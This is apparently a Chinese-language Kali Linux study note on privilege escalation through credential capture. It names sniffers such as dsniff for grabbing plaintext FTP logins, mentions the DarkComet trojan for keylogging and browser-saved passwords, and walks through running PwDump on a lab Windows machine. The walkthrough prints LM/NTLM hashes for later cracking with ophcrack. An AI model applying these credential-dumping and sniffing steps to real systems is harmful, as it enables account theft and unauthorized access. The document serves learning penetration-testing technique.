Kali linux 学习笔记（二十二）提权——抓包提权（sniffer、缓存、pwdump） 2020.3.3

前言

之前提到了要提升权限
方法很多上节学的是本地的一些方法
这节主要通过抓包来实现提权

1、抓包工具

Windows：

• Wireshark
• Omnipeek
• Commview
• Sniffpass：抓取密码相关的数据包

Linux：

• Tcpdump
• Wireshark
• Dsniff：抓取密码相关的数据包

最简单：dsniff -i eth0
只要有人ftp连接过来，就会抓取账号密码
只能抓明文

2、木马软件

木马显然是可以用的（不知道会不会被和谐）
反正这里就提一嘴
如 DarkCometRAT
在控制目标主机之后可以监控键盘记录信息

3、本地缓存密码

通过浏览器查看保存的账号密码
这个找找就有了
如果目标机都让浏览器保存密码的话
显然舒服的很

另外提供一个网站
windows密码恢复工具
http://www.nirsoft.net/password_recovery_tools.html

4、pwdump

kali:

cd /usr/share/windows-binaries/
cp fgdump/ -R /media/sf_D_DRIVE/ #拷贝到windows中

windows:

  C:\Documents and Settings\kevin>net user user2 123456 /add #添加一个user2账号，密码123456
  C:\Documents and Settings\kevin>net user
   \\ICST-WINATT 的用户帐户
   -------------------------------------------------------------
   Administrator            Guest                    HelpAssistant
   kevin                    SUPPORT_388945a0         test
   user1                    user2
  C:\Documents and Settings\kevin>cd \
  C:\>PwDump.exe localhost
   Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
   Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
   HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
   kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
   SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
   test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
   user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
   user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
# 结果：前部分是 LMHASH ，后部分是 NTLMHASH
#admin的sid一般都是500
#得到账密码的密文形式（哈希算法）

copy到kali里破解
比如ophcrack就可以破解简单的哈希加密

结语

抓包就完事了